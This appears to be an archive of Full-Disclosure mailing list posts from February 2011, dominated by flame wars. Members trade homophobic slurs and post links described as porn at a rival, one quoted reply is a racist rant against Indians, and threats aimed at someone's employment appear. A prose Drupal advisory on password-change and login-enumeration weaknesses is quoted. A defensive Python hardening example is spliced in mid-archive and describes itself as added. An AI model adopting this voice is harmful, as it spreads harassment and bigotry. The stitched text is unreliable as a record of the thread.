Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
But you've not proven anything. All you've done is said "I rest my case".

I refer you also to: http://www.urbandictionary.com/define.php?term=trolling

On Mon, Feb 21, 2011 at 7:12 PM, Paul Schmehl wrote:

> I rest my case.
>
>
> --On February 21, 2011 7:04:33 PM +0000 "Cal Leeming [Simplicity Media
> Ltd]"  wrote:
>
>> And why is that, Paul?
>>
>> On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl wrote:
>>
>>> --On February 21, 2011 6:15:07 PM +0000 "Cal Leeming [Simplicity Media
>>> Ltd]" wrote:
>>>
>>>> Can anyone recommend any decent lists, preferably that are moderated
>>>> against douchebaggery and trolls (but allow swearing and insults etc),
>>>> and allows for general security/tech related discussion?
>>>
>>> Seriously?  I think it's safe to assume you don't understand irony.
>>
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
> "There are some ideas so wrong that only a very
> intelligent person could believe in them." George Orwell
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Posting a porn thread isn't trolling though. Please explain how on earth
that would be considered trolling?

On Mon, Feb 21, 2011 at 7:08 PM, Mike Hale wrote:

> Your porn thread among others?  Is this a serious question?
>
> On Mon, Feb 21, 2011 at 11:07 AM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > How so?
> >
> > On Mon, Feb 21, 2011 at 7:06 PM, Mike Hale 
> > wrote:
> >>
> >> Probably because you've been the biggest troll on this list for the
> >> last few weeks?
> >>
> >> On Mon, Feb 21, 2011 at 11:04 AM, Cal Leeming [Simplicity Media Ltd]
> >>  wrote:
> >> > And why is that, Paul?
> >> >
> >> > On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl <
> pschmehl_li...@tx.rr.com>
> >> > wrote:
> >> >>
> >> >> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity
> Media
> >> >> Ltd]"  wrote:
> >> >>
> >> >>> Can anyone recommend any decent lists, preferably that are moderated
> >> >>> against douchebaggery and trolls (but allow swearing and insults
> etc),
> >> >>> and allows for general security/tech related discussion?
> >> >>
> >> >> Seriously?  I think it's safe to assume you don't understand irony.
> >> >>
> >> >> --
> >> >> Paul Schmehl, Senior Infosec Analyst
> >> >> As if it wasn't already obvious, my opinions
> >> >> are my own and not those of my employer.
> >> >> ***
> >> >> "It is as useless to argue with those who have
> >> >> renounced the use of reason as to administer
> >> >> medication to the dead." Thomas Jefferson
> >> >> "There are some ideas so wrong that only a very
> >> >> intelligent person could believe in them." George Orwell
> >> >>
> >> >
> >> >
> >> >
> >>
> >>
> >>
> >> --
> >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
> >
> >
>
>
>
> --
> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
For accurate definitions of what trolling is, see this:

http://www.urbandictionary.com/define.php?term=trolling

Top definition is:
"Being a prick on the internet because you can. Typically unleashing one or
more cynical or sarcastic remarks on an innocent by-stander, because it's
the internet and, hey, you can."

On Mon, Feb 21, 2011 at 7:09 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Posting a porn thread isn't trolling though. Please explain how on earth
> that would be considered trolling?
>
>
> On Mon, Feb 21, 2011 at 7:08 PM, Mike Hale wrote:
>
>> Your porn thread among others?  Is this a serious question?
>>
>> On Mon, Feb 21, 2011 at 11:07 AM, Cal Leeming [Simplicity Media Ltd]
>>  wrote:
>> > How so?
>> >
>> > On Mon, Feb 21, 2011 at 7:06 PM, Mike Hale 
>> > wrote:
>> >>
>> >> Probably because you've been the biggest troll on this list for the
>> >> last few weeks?
>> >>
>> >> On Mon, Feb 21, 2011 at 11:04 AM, Cal Leeming [Simplicity Media Ltd]
>> >>  wrote:
>> >> > And why is that, Paul?
>> >> >
>> >> > On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl <
>> pschmehl_li...@tx.rr.com>
>> >> > wrote:
>> >> >>
>> >> >> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity
>> Media
>> >> >> Ltd]"  wrote:
>> >> >>
>> >> >>> Can anyone recommend any decent lists, preferably that are
>> moderated
>> >> >>> against douchebaggery and trolls (but allow swearing and insults
>> etc),
>> >> >>> and allows for general security/tech related discussion?
>> >> >>
>> >> >> Seriously?  I think it's safe to assume you don't understand irony.
>> >> >>
>> >> >> --
>> >> >> Paul Schmehl, Senior Infosec Analyst
>> >> >> As if it wasn't already obvious, my opinions
>> >> >> are my own and not those of my employer.
>> >> >> ***
>> >> >> "It is as useless to argue with those who have
>> >> >> renounced the use of reason as to administer
>> >> >> medication to the dead." Thomas Jefferson
>> >> >> "There are some ideas so wrong that only a very
>> >> >> intelligent person could believe in them." George Orwell
>> >> >>
>> >> >
>> >> >
>> >> >
>> >>
>> >>
>> >>
>> >> --
>> >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>> >
>> >
>>
>>
>>
>> --
>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>>
>
>

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Ah I've used IRC since I was 10 years old ;o See this kinda shit never
really goes down on IRC or 4chan.. but the moment you bring a mailing list
or forum into the equation, it's like some people just turn into super
grammar warriors / douche bags, and I've no idea why :S

On Mon, Feb 21, 2011 at 6:53 PM, Michael Krymson  wrote:

> Swearing? Several. Insults? I think most people would include that under
> douchebaggery. What you want probably fits better under forums or IRC chans
> rather than mailing lists.
>
> Not to state the obvious, but I've not personally been subjected to
> n3ttie's emails for some time, except when people include them in their
> responses...
>
> If there is someone you think is n3ttie posting under some other name, keep
> in mind he has always been decidedly non-technical and it is not terribly
> hard to pick his tone/style/subjects out of a crowd. It wouldn't take a
> doctorate to analyze the text.
>

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
How so?

On Mon, Feb 21, 2011 at 7:06 PM, Mike Hale wrote:

> Probably because you've been the biggest troll on this list for the
> last few weeks?
>
> On Mon, Feb 21, 2011 at 11:04 AM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > And why is that, Paul?
> >
> > On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl 
> > wrote:
> >>
> >> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity Media
> >> Ltd]"  wrote:
> >>
> >>> Can anyone recommend any decent lists, preferably that are moderated
> >>> against douchebaggery and trolls (but allow swearing and insults etc),
> >>> and allows for general security/tech related discussion?
> >>
> >> Seriously?  I think it's safe to assume you don't understand irony.
> >>
> >> --
> >> Paul Schmehl, Senior Infosec Analyst
> >> As if it wasn't already obvious, my opinions
> >> are my own and not those of my employer.
> >> ***
> >> "It is as useless to argue with those who have
> >> renounced the use of reason as to administer
> >> medication to the dead." Thomas Jefferson
> >> "There are some ideas so wrong that only a very
> >> intelligent person could believe in them." George Orwell
> >>
> >
> >
> >
>
>
>
> --
> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
And why is that, Paul?

On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl wrote:

> --On February 21, 2011 6:15:07 PM +0000 "Cal Leeming [Simplicity Media
> Ltd]"  wrote:
>
>> Can anyone recommend any decent lists, preferably that are moderated
>> against douchebaggery and trolls (but allow swearing and insults etc),
>> and allows for general security/tech related discussion?
>>
>
> Seriously?  I think it's safe to assume you don't understand irony.
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
> "There are some ideas so wrong that only a very
> intelligent person could believe in them." George Orwell
>
>

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Sorry I should re-phrase, this kinda stuff does go down on 4chan/irc, but
they are more upfront about it. A few random insults fly, and that's about
it. It's not a constant going flow of bitchiness, unless you bring dalnet
into the equation lol.

On Mon, Feb 21, 2011 at 6:57 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Ah I've used IRC since I was 10 years old ;o See this kinda shit never
> really goes down on IRC or 4chan.. but the moment you bring a mailing list
> or forum into the equation, it's like some people just turn into super
> grammar warriors / douche bags, and I've no idea why :S
>
> On Mon, Feb 21, 2011 at 6:53 PM, Michael Krymson wrote:
>
>> Swearing? Several. Insults? I think most people would include that under
>> douchebaggery. What you want probably fits better under forums or IRC chans
>> rather than mailing lists.
>>
>> Not to state the obvious, but I've not personally been subjected to
>> n3ttie's emails for some time, except when people include them in their
>> responses...
>>
>> If there is someone you think is n3ttie posting under some other name,
>> keep in mind he has always been decidedly non-technical and it is not
>> terribly hard to pick his tone/style/subjects out of a crowd. It wouldn't
>> take a doctorate to analyze the text.
>>

[Full-disclosure] Other recommended lists?

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Can anyone recommend any decent lists, preferably that are *moderated* against
douchebaggery and trolls (but allow swearing and insults etc), and allows
for general security/tech related discussion?

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
http://bit.ly/gOq1x2

More porn from Andrew :)

On Mon, Feb 21, 2011 at 3:22 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Mon, Feb 21, 2011 at 12:14 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I should remove the company name from my emails
>
> You breaking the law by threatening violence is nothing to do with your
> "company", nor is discrimination.
>
> It's you on a personal level in that, your comments have been forwarded to
> law enforcement folks.
>
> Also, note that some of my members are SIA approved in self-defence and
> restraining techniques.
>
> If you were to approach me at a public event, you would be restrained and
> put into a citizens arrest situation and the police called.
>
> I assure you your comments towards me have been noted and measures taken to
> make sure you cannot carry out your threat, or get away with your
> discriminatory behaviour.
>
> Your comments are also forwarded to BBC producers to update them on what
> you've been saying on this mailing list.
>
> Any potential employers in the IT Security industry you may have had, are
> already aware of you as they've been reading your emails and are unlikely to
> offer you a position.
>
>
> I know I have already forwarded your comments to my mailing list, to make
> sure everyone in my consortium is aware of what you've been saying to me.
>
> I'm already in contact with folks I know from the industry in Coventry to
> make sure you have a hard time getting hired in the future in your local
> area.
>
> Andrew
>
>

Re: [Full-disclosure] University of Central Florida Multiple LFI / Dirty Indian rant

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
lmao.

On Mon, Feb 21, 2011 at 3:04 PM, Eyeballing Weev
wrote:

> My name is Endia Pakistan.
> I am from Pakistan
> I want to know why you dirty, dirty Indian mud people are doing here in
> America.
>
> I violate the corpses floating in the Ganges River.
>
> Why does India have so many people but so few toilets and they waste
> their money by putting the likes of you online?
>
> On 02/21/2011 08:48 AM, Nikhil Mittal wrote:
> >
> >  >>Madhur Ahuja and "Hack Talk" are obviously from third world countries
> >  >>and are only doing this for publicity
> >
> >
> > So fag, what you would have done it for ? Free gay sex with
> > Administrators from the University ?
> >
> > You felt bad if kids from so called "Third World" countries used FD for
> > some adventure. Come on get past this "Third World" mentality.
> >
>

Re: [Full-disclosure] Abuse of Functionality vulnerabilities in Drupal

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Anyone aware of this being abused in the wild?

On Mon, Feb 21, 2011 at 3:11 PM, tc  wrote:

> -
>  Timeline:
> -
>
> 2009.03.05 - disclosed at http://www.madirish.net/?article=239
> 2009.03.15 - posted to FD (http://seclists.org/fulldisclosure/2009/Mar/115)
> 2009.03.15 - 2010.12.20 - No one gave a fuck
> 2010.12.20 - MustLive announced at my site.
> 2010.12.21 - MustLive informed developers.
> 2011.02.18 - disclosed at MustLive's site.
> 2011.02.18 - current - Everyone continued to not give a fuck
>
>
>
> On Mon, Feb 21, 2011 at 11:00 PM, Justin Klein Keane
>  wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > - 
> > Timeline:
> > - 
> >
> > 2009.03.05 - disclosed at http://www.madirish.net/?article=239
> > 2009.03.15 - posted to FD (http://seclists.org/fulldisclosure/2009/Mar/115)
> > 2010.12.20 - MustLive announced at my site.
> > 2010.12.21 - MustLive informed developers.
> > 2011.02.18 - disclosed at MustLive's site.
> >
> > Justin C. Klein Keane
> > http://www.MadIrish.net
> >
> > The digital signature on this message can be confirmed
> > using the public key at http://www.madirish.net/gpgkey
> >
> > On 02/19/2011 02:28 PM, MustLive wrote:
> >> Hello list!
> >>
> >> I want to warn you about Abuse of Functionality vulnerabilities in Drupal.
> >>
> >> -
> >> Affected products:
> >> -
> >>
> >> Vulnerable are Drupal 6.20 and previous versions.
> >>
> >> --
> >> Details:
> >> --
> >>
> >> Abuse of Functionality (WASC-42):
> >>
> >> There is unreliable mechanism of changing password in the system. In user
> >> profile (http://site/user/1/edit) it's possible to change password without
> >> knowing of current password. And even there is protection against CSRF in
> >> the form, this will not protect against Abuse of Functionality.
> >>
> >> Because with using of XSS vulnerabilities it's possible to bypass this
> >> protection and conduct remote attack for changing of the password (including
> >> administrator's one). Or at session hijacking via XSS it's possible to get
> >> into account and change the password. Or it's possible to do that at
> >> temporarily access to user's computer, from which he logged in to his
> >> account.
> >>
> >> Abuse of Functionality (WASC-42):
> >>
> >> Besides two before-mentioned methods (http://websecurity.com.ua/4763/),
> >> there are the next methods for enumerating of logins of the users.
> >>
> >> At the forum (http://site/forum) logins of the users show, which posted at
> >> the forum (opened a topic or wrote a comment).
> >>
> >> In section Recent posts (http://site/tracker) at pages "All last posts" and
> >> "My posts" logins of the users show, which wrote posts at the site. Attack
> >> is possible to conduct only for logged in users.
> >>
> >> In posts of the blog (http://site/content/post), and also in comments to
> >> blog posts and other pages of the site (http://site/page) logins of the
> >> users show, which made a post in blog or made a comment.
> >>
> >> In password recovery form (http://site/user/password) it's possible on find
> >> existent logins and e-mails of the users at the site. If to send incorrect
> >> login or e-mail then the message shows "Sorry, ... is not recognized as a
> >> user name or an e-mail address.", and if to send correct login or e-mail,
> >> then this message will not show.
> >>
> >> 
> >> Timeline:
> >> 
> >>
> >> 2010.12.20 - announced at my site.
> >> 2010.12.21 - informed developers.
> >> 2011.02.18 - disclosed at my site.
> >>
> >> I mentioned about these vulnerabilities at my site
> >> (http://websecurity.com.ua/4776/).
> >>
> >> Best wishes & regards,
> >> MustLive
> >> Administrator of Websecurity web site
> >> http://websecurity.com.ua
> >>
> >>
> > -BEGIN PGP SIGNATURE-
> > Version: GnuPG v1.4.11 (GNU/Linux)
> > Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
> >
> > -END PGP SIGNATURE-
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.g
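The two behaviours the quoted advisory describes (a recovery form whose reply differs for unknown names, and a profile form that changes the password without asking for the current one), shown beside hardened forms as an added example that is not part of the original thread and is not Drupal code. The `AccountStore` class, its method names, the generic reply text and the sample account are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 100_000
# Assumed wording; the point is that it is identical for known and unknown names.
GENERIC_REPLY = "If that account exists, further instructions have been sent."


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class AccountStore:
    """Constructed in-memory user table standing in for a CMS user database."""

    def __init__(self):
        self._users = {}   # login -> {"mail", "salt", "hash"}
        self.outbox = []   # (mail, token) pairs that would be e-mailed

    def add(self, login, mail, password):
        salt = secrets.token_bytes(16)
        self._users[login] = {"mail": mail, "salt": salt,
                              "hash": _hash(password, salt)}

    def _find(self, identifier):
        for login, rec in self._users.items():
            if identifier in (login, rec["mail"]):
                return login, rec
        return None, None

    def verify(self, login, password):
        rec = self._users.get(login)
        # Hash even for unknown logins so the work done does not reveal existence.
        salt = rec["salt"] if rec else b"\x00" * 16
        candidate = _hash(password, salt)
        return bool(rec) and hmac.compare_digest(candidate, rec["hash"])

    # Password recovery form 

    def reset_leaky(self, identifier):
        """Reply differs for unknown names, as the advisory reports."""
        _, rec = self._find(identifier)
        if rec is None:
            return (f"Sorry, {identifier} is not recognized as a user name "
                    "or an e-mail address.")
        self.outbox.append((rec["mail"], secrets.token_urlsafe(32)))
        return "Further instructions have been sent to your e-mail address."

    def reset_uniform(self, identifier):
        """Same reply either way; a token is mailed only if the account exists."""
        _, rec = self._find(identifier)
        if rec is not None:
            self.outbox.append((rec["mail"], secrets.token_urlsafe(32)))
        return GENERIC_REPLY

    # Profile edit form 

    def change_password(self, session_login, current_password, new_password):
        """Require the current password, so a stolen session or a script
        running in the victim's browser cannot set a new one on its own."""
        if not self.verify(session_login, current_password):
            return False
        salt = secrets.token_bytes(16)
        rec = self._users[session_login]
        rec["salt"], rec["hash"] = salt, _hash(new_password, salt)
        return True


if __name__ == "__main__":
    store = AccountStore()
    store.add("alice", "alice@example.test", "old-secret")  # constructed account
    print(store.reset_leaky("nobody"))
    print(store.reset_uniform("nobody"))
    print(store.change_password("alice", "wrong-guess", "x"))
```

The uniform reply closes only the recovery-form channel; the forum, tracker and blog pages listed in the advisory still display logins by design.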

Re: [Full-disclosure] New tool for penetration testing!!!

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Has anyone actually tried it yet?

On Mon, Feb 21, 2011 at 1:18 PM, James Lay  wrote:

> From: runlvl 
> Date: Mon, 21 Feb 2011 02:57:58 -0300
> To: Full-disclosure 
> Subject: [Full-disclosure] New tool for penetration testing!!!
>
> Insecurity Research is happy to announce the release of version 2.0,
> get it now while it is still hot !
>
> Insect Pro 2.0 is a penetration security auditing and testing software
> solution designed to allow organizations of all sizes mitigate,
> monitor and manage the latest security threats vulnerabilities.
>
> We’re always working to improve Insect Pro and now the users obtain
> all the metasploit functionalities plus all the Insect Pro modules
> merge all in a unique application.
>
> We invite you to take a visual tour where you can find screen shots and
> videos, visit us at http://www.insecurityresearch.com
>
> We are really thankful with the community, thanks for all your support
> that keep us coding!
>
> There is no fixed price to get it, you can obtain the full version
> with updates from $20 !
>
> Get it now from: http://www.insecurityresearch.com
>
>
>
>
> This is really starting to look like spam…..
>
>

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
http://www.urbandictionary.com/define.php?term=friends

lmao.

On Mon, Feb 21, 2011 at 12:44 PM, Benji  wrote:

> including friends, girl/boyfriend, cocaine
>
> On Mon, Feb 21, 2011 at 12:11 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> But, Nijntje is awesome, period. :D And trust me, when you have kids,
>> you'll learn to love all the things your kids love (this includes children's
>> tv programmes, characters, teddies etc lol).
>>
>> On 21 Feb 2011 10:58, "huj huj huj"  wrote:
>>
>> hello kitty? really? is your girlfriend 14?
>>
>> 2011/2/19 Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk>
>>
>>> >
>>> > Andrew,
>>> >
>>> > Me and my girl made you a little gift, just for you! (no it's not porn
>>> lol)
>>> >
>>> > http...
>>>
>>> > ___
>>> > Full-Disclosure - We believe in it.
>>> > Charter: h...
>>>
>>>
>>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
The fact you said /b/tard says otherwise :S

On 21 Feb 2011 10:51, "huj huj huj"  wrote:

we are not your /b/tarded /b/rothers



2011/2/19 Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk>

> >
> > LMAO, no.
> >
> > But Andrew, thank you for giving me yet another opportunity to treat our
> fellow /b...
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: h...
>

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
Finally, a response worthy of a non porn reply! Well done AndyPants!

You're not entirely correct. But you do hold a valid point that I should
remove the company name from my FD emails and/or add a liability disclaimer
in the footer. But footers suck for mailing lists, and you really are a
complete and total faggot (see urbandictionary for alternative meanings,
trying to be a grammar whore isn't going to help you here). So, we'll see :D

On 21 Feb 2011 11:26, "andrew.wallace" 
wrote:

On Sun, Feb 20, 2011 at 12:54 AM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:
> you fucking faggot

What Cal doesn't realise is, not only are threats of violence against the
law, but discrimination in the work place over sexual orientation is also
against the law.

He isn't doing well in convincing us that he's a reformed criminal, maybe he
was just telling porkies to the BBC.

http://www.bbc.co.uk/insideout/content/articles/2008/04/09/west_midlands_hackers_s13_w7_feature.shtml

http://www.youtube.com/watch?v=p8IjLnMYZXo

Andrew

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-21 Thread Cal Leeming [Simplicity Media Ltd]
But, Nijntje is awesome, period. :D And trust me, when you have kids, you'll
learn to love all the things your kids love (this includes children's tv
programmes, characters, teddies etc lol).

On 21 Feb 2011 10:58, "huj huj huj"  wrote:

hello kitty? really? is your girlfriend 14?

2011/2/19 Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk>

> >
> > Andrew,
> >
> > Me and my girl made you a little gift, just for you! (no it's not porn
> lol)
> >
> > http...
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: h...
>

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-20 Thread Cal Leeming [Simplicity Media Ltd]
Whoa, that went *completely* over my head lol ;(

On 20 Feb 2011 02:17,  wrote:

On Sat, 19 Feb 2011 20:10:59 GMT, "Cal Leeming [Simplicity Media Ltd]" said:
> Son, this is how we d...
Unfortunately, he's probably been around longer than you have...


> On Sat, Feb 19, 2011 at 5:31 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> > We know you're desperate for attention when you post pictures of
yourself
> > to the public doma...
But he still doesn't make sense.  A security professional who's been around
as long as he has should know that in any Berne Convention signatory nation,
merely posting a picture does *not* release it into the "public domain",
and that in fact it's (depending on the nation) somewhere between difficult
and impossible to actually release something into public domain before the
copyright has expired.  Therefore, we are obviously being trolled by
a fake Andrew...

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-19 Thread Cal Leeming [Simplicity Media Ltd]
LMFAO. Omg, I just lol'd so hard, you fucking faggot lmao. I would have
posted more porn, but I'm on my phone in bed, so it'll have to wait. Much
love. <3 x x

On 20 Feb 2011 00:45, "andrew.wallace" 
wrote:

On Sat, Feb 19, 2011 at 8:10 PM, Cal Leeming [Simplicity Media Ltd]

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-19 Thread Cal Leeming [Simplicity Media Ltd]
Here's the closest thing I have to Hello Kitty.

http://bit.ly/e04RrC

It's us with Nijntje - the little rabbit from the picture, she's much better
than hello kitty! - see http://www.nijntje.nl/ )

We went to the Dick Bruna store in Utrecht and brought tons of Nijntje
stuff, and we spent 3 hours looking for her statue, but it was totally worth
it :D

On Sat, Feb 19, 2011 at 5:26 PM, Hack Talk  wrote:

> I say we need moar Hello Kitty and less flamewars
>
>
> Luis Santana
>
>
>
> On Sat, Feb 19, 2011 at 12:20 PM, Psychobilly  wrote:
>
>> From the distant
>> I can feel
>> The creeping smell
>> Of sudden life leaks
>> Tar is packaging
>> The network is hungry.
>>
>>
>> Le 19/02/2011 17:26, Cal Leeming [Simplicity Media Ltd] a écrit :
>> > Andrew,
>> >
>> > Me and my girl made you a little gift, just for you! (no it's not porn
>> lol)
>> >
>> > http://bit.ly/ftK9VF
>> >
>> > Much love, Cal <3
>> >
>> > On Sat, Feb 19, 2011 at 2:42 PM, andrew.wallace
>> > mailto:andrew.wall...@rocketmail.com>>
>> > wrote:
>> >
>> > On Sat, Feb 19, 2011 at 2:08 PM, Cal Leeming [Simplicity Media Ltd]
>> > > > <mailto:cal.leem...@simplicitymedialtd.co.uk>> wrote:
>> > > no.
>> >
>> > A colleague of mine approached me today and mentioned all my emails
>> > are appearing on Full-Disclosure mailing list.
>> >
>> > Why do you forward all my off list emails to the disclosure
>> > community? Is it some sort of attention seeking exercise?
>> >
>> > A kind of, 'look who sends me private emails I must be someone
>> > important'?
>> >
>> > Andrew
>> >
>> >
>> >
>> >

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-19 Thread Cal Leeming [Simplicity Media Ltd]
Son, this is how we deal with newfags on 4chan, and you sir, are a newfag.

Here's some more porn:

http://bit.ly/gVyp0R

Getting bored yet?

On Sat, Feb 19, 2011 at 5:31 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Sat, Feb 19, 2011 at 4:26 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Andrew,
> > Me and my girl made you a little gift, just for you! (no it's not porn
> lol)
>
> We know you're desperate for attention when you post pictures of yourself
> to the public domain.
>
> Andrew
>
>

[Full-disclosure] (a present for andrew wallace, with love from cal)‏

2011-02-19 Thread Cal Leeming [Simplicity Media Ltd]
Andrew,

Me and my girl made you a little gift, just for you! (no it's not porn lol)

http://bit.ly/ftK9VF

Much love, Cal <3

On Sat, Feb 19, 2011 at 2:42 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Sat, Feb 19, 2011 at 2:08 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > no.
>
> A colleague of mine approached me today and mentioned all my emails are
> appearing on Full-Disclosure mailing list.
>
> Why do you forward all my off list emails to the disclosure community? Is
> it some sort of attention seeking exercise?
>
> A kind of, 'look who sends me private emails I must be someone important'?
>
> Andrew
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-19 Thread Cal Leeming [Simplicity Media Ltd]
LMAO, no.

But Andrew, thank you for giving me yet another opportunity to treat our
fellow /b/rothers to more tasty treats!

http://bit.ly/f6eCBc

Enjoy :)

On Sat, Feb 19, 2011 at 10:42 AM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Fri, Feb 18, 2011 at 7:28 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Andrew, I used to fucking work in a NOC as a security consultant you
> idiotic
> > piece of shit. I also used to spend 12 - 18 hours a day in various
> > data centres in Harbour Exchange.
> > Go and check my linkedin.
>
> May I enquire, have you been drinking at home lately or suffering from
> behavioural problems or mood swings? This would tally in with your postings
> lately. I assure you no one recruiting at the moment would let you inside an
> operations centre in your current state of mind. Sort yourself out and stop
> coming on the disclosure community and spamming your LinkedIn profile into
> everyone's inboxes and expecting to be headhunted.
>
> Andrew
>
>

Re: [Full-disclosure] Fwd: HBGary Mirrors?

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
LMAO, that's fucking brilliant. :D

(had to modify the reply a little, Google was picking it up as spam, and
forcibly not sending out :S)

On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

>
>
>
>> On Fri, Feb 18, 2011 at 7:33 PM, Veg <*> wrote:
>>
>>> Pertaining to your question about the key versus the cryptotext:
>>>
>>> *http://bit.ly/hSmqvA*
>>>
>>>
>>>
>>>
>>
>

Re: [Full-disclosure] HBGary Mirrors?

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
Oh, I didn't realise that's what FreeNet did, I thought it was a tor
alternative!

On Fri, Feb 18, 2011 at 7:28 PM,  wrote:

> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
> > If illegally distributed files (such as this one) were encrypted and
> hosted
> > on one server, and the key hosted on another, which server would
> > be eligible for take down?
>
> Questions like that are part of why FreeNet and similar systems were
> designed.
> Nobody wants to be the test case for a simple question like that one,
> because
> even if you win the test case, it still sucks.  So the obvious thing to do
> is
> fix things so the simple questions aren't an issue anymore, with the hope
> that
> the hard questions remain un-askable.
>
> When even the person who stored the file can't tell where the file is, and
> the admin of each participating server has no way of telling what got
> stored
> on their node, it becomes really hard to draft a proper legal notice
> (either
> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious
> stuff).
>
>
>
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, I used to fucking work in a NOC as a security consultant you idiotic
piece of shit. I also used to spend 12 - 18 hours a day in various
data centres in Harbour Exchange.

Go and check my linkedin.

Oh and, as promised: http://bit.ly/eQIk4O



On Fri, Feb 18, 2011 at 7:22 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Fri, Feb 18, 2011 at 4:50 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > "operations centre email system"
>
> When you ever get a job in the industry, which is unlikely because of your
> criminal record you might get to know what an operations centre is.
>
> http://en.wikipedia.org/wiki/Network_operations_center
>
> Andrew
>
>

Re: [Full-disclosure] Fwd: HBGary Mirrors?

